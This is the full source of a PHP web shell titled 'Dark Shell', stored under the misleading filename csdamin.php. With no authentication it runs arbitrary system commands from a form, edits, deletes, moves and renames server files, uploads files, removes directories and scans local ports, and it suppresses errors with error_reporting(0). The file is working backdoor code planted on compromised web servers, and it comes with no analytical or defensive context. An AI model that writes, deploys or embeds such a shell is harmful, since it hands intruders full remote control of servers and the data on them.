csdamin.php

1. <html>
2. <head>
3. <title>
4. Dark Shell
5. </title>
6. </head>
7. <body>
8. <style type="text/css">
9. body{
10. background: #E4E4E4;
11. color: #666666;
12. font-family: Verdana;
13. font-size: 11px;
14. }
15. a:link{
16. color: #33CC99;
17. }
18. a:visited{
19. color: #33CC99;
20. }
21. a:hover{
22. text-decoration: none;
23. Color: #3399FF;
24. }
25. table {
26. font-size: 11px;
27. }
28. </style>
29. <?php
30. error_reporting (0);
31. set_time_limit (0);
32. if (empty ($_GET ['dir'])){
33. $dir = getcwd ();
34. }
35. else {
36. $dir = $_GET ['dir'];
37. }
38. chdir ($dir);
39. $current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);
40.  
41. echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
42. echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
43. echo "Current directory: " . getcwd () . "<br>\n";
44. echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
45. echo "<pre>\n\n\n</pre>";
46.  
47. echo "<table width = 50%>";
48. echo "<tr>";
49. echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
50. echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
51. echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
52. echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
53. echo "</tr></table>";
54. echo "<pre>\n\n</pre>";
55.  
56.  
57.  
58. $mode = $_GET ['mode'];
59. switch ($mode){
60. case 'edit':
61. $file = $_GET ['file'];
62. $new = $_POST ['new'];
63. if (empty ($new)){
64. $fp = fopen ($file, "r");
65. $file_cont = fread ($fp, filesize ($file));
66. $file_cont = str_replace ("</textarea>", "<textarea>", $file_cont);
67. echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
68. echo "File: ". $file . "<br>\n";
69. echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."</textarea><br>\n";
70. echo "<input type = 'submit' value = 'Edit'></form>\n";
71. }
72. else {
73. $fp = fopen ($file, "w");
74. if (fwrite ($fp, $new)){
75. echo $file . " edited.<p>";
76. }
77. else {
78. echo "Unable to edit " . $file . ".<p>";
79. }
80. }
81. fclose ($fp);
82. break;
83. case 'delete':
84. $file = $_GET ['file'];
85. if (unlink ($file)){
86. echo $file . " deleted successfully.<p>";
87. }
88. else {
89. echo "Unable to delete " . $file . ".<p>";
90. }
91. break;
92. case 'copy':
93. $src = $_GET ['src'];
94. $dst = $_POST ['dst'];
95. if (empty ($dst)){
96. echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
97. echo "Destination: <input name = 'dst'><br>\n";
98. echo "<input type = 'submit' value = 'Copy'></form>\n";
99. }
100. else {
101. if (copy ($src, $dst)){
102. echo "File copied successfully.<p>\n";
103. }
104. else {
105. echo "Unable to copy " . $src . ".<p>\n";
106. }
107. }
108. break;
109. case 'move':
110. $src = $_GET ['src'];
111. $dst = $_POST ['dst'];
112. if (empty ($dst)){
113. echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
114. echo "Destination: <input name = 'dst'><br>\n";
115. echo "<input type = 'submit' value = 'Move'></form>\n";
116. }
117. else {
118. if (rename ($src, $dst)){
119. echo "File moved successfully.<p>\n";
120. }
121. else {
122. echo "Unable to move " . $src . ".<p>\n";
123. }
124. }
125. break;
126. case 'rename':
127. $old = $_GET ['old'];
128. $new = $_POST ['new'];
129. if (empty ($new)){
130. echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
131. echo "New name: <input name = 'new'><br>\n";
132. echo "<input type = 'submit' value = 'Rename'></form>\n";
133. }
134. else {
135. if (rename ($old, $new)){
136. echo "File/Directory renamed successfully.<p>\n";
137. }
138. else {
139. echo "Unable to rename " . $old . ".<p>\n";
140. }
141. }
142. break;
143.  
144. case 'rmdir':
145. $rm = $_GET ['rm'];
146. if (rmdir ($rm)){
147. echo "Directory removed successfully.<p>\n";
148. }
149. else {
150. echo "Unable to remove " . $rm . ".<p>\n";
151. }
152. break;
153. case 'system':
154. $cmd = $_POST ['cmd'];
155. if (empty ($cmd)){
156. echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
157. echo "Shell Command: <input name = 'cmd'>\n";
158. echo "<input type = 'submit' value = 'Run'></form><p>\n";
159. }
160. else {
161. system ($cmd);
162. }
163. break;
164. case 'create':
165. $new = $_POST ['new'];
166. if (empty ($new)){
167. echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
168. echo "<tr><td>New file: <input name = 'new'></td>\n";
169. echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
170. }
171. else {
172. if ($fp = fopen ($new, "w")){
173. echo "File created successfully.<p>\n";
174. }
175. else {
176. echo "Unable to create ".$file.".<p>\n";
177. }
178. fclose ($fp);
179. }
180. break;
181. case 'upload':
182. $temp = $_FILES['upload_file']['tmp_name'];
183. $file = basename($_FILES['upload_file']['name']);
184. if (empty ($file)){
185. echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
186. echo "Local file: <input type = 'file' name = 'upload_file'>\n";
187. echo "<input type = 'submit' value = 'Upload'>\n";
188. echo "</form>\n<pre>\n\n</pre>";
189. }
190. else {
191. if(move_uploaded_file($temp,$file)){
192. echo "File uploaded successfully.<p>\n";
193. unlink ($temp);
194. }
195. else {
196. echo "Unable to upload " . $file . ".<p>\n";
197. }
198. }
199. break;
200.  
201. case 'port_scan':
202. $port_range = $_POST ['port_range'];
203. if (empty ($port_range)){
204. echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
205. echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
206. echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
207. echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
208. }
209. else {
210. $range = explode (":", $port_range);
211. if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
212. echo "Bad parameters.<br>";
213. }
214. else {
215. $host = 'localhost';
216. $from = $range [0];
217. $to = $range [1];
218. echo "Open ports:<br>";
219. while ($from <= $to){
220. $var = 0;
221. $fp = fsockopen ($host, $from) or $var = 1;
222. if ($var == 0){
223. echo $from . "<br>";
224. }
225. $from++;
226. fclose ($fp);
227. }
228. }
229. }
230. break;
231.  
232.  
233. }
234.  
235. clearstatcache ();
236.  
237. echo "<pre>\n\n</pre>";
238. echo "<table width = 100%>\n";
239. $files = scandir ($dir);
240. foreach ($files as $file){
241. if (is_file ($file)){
242.  
243. $size = round (filesize ($file) / 1024, 2);
244. echo "<tr><td>".$file."</td>";
245. echo "<td>".$size." KB</td>";
246. echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
247. echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
248. echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
249. echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
250. echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
251. }
252. else {
253. $items = scandir ($file);
254. $items_num = count ($items) - 2;
255. echo "<tr><td>".$file."</td>";
256. echo "<td>".$items_num." Items</td>";
257. echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
258. echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
259. echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
260. }
261. }
262. echo "</table>\n";
263. ?>